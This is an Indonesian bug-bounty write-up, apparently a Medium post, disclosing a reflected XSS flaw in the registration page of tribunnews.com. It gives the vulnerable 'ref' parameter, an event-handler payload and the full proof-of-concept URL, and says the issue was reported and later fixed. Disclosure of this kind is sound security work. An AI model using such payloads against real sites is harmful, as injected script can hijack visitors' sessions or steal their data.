Open in app

Sign in

Write

Sign in

XSS REFLECTED Di Situs Tribunnews.com

Aidil Arief
Jan 16, 2021

--

Hi, Bug Hunter & Teman-teman Semua.

Di kesempatan kali ini saya bakal menuliskan tentang write up bug yang saya temukan di situs Tribunnews.com.

Baik langsung saya ke topik pembahasannya.

Vulnerability XSS REFLECTED terdapat di fitur Login. Berikut url nya :

https://www.tribunnews.com/auth/register?ref=

Disana memiliki kerentanan XSS REFLECTED, tepatnya di parameter ?ref=

Payload :

“onclick=”prompt(document.domain)

Final URL :

https://www.tribunnews.com/auth/register?ref=%22onclick=%22prompt(document.domain)

Pop up muncul..

XSS REFLECTED TRIBUNNEWS

Timeline :

Report : 28/12/2020

Fix : 05/01/2021

Xss Vulnerability
Bugs
Bug Fixes

--

--

Aidil Arief
Aidil Arief

Written by Aidil Arief

789 Followers
3 Following

Keep to secure the internet

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams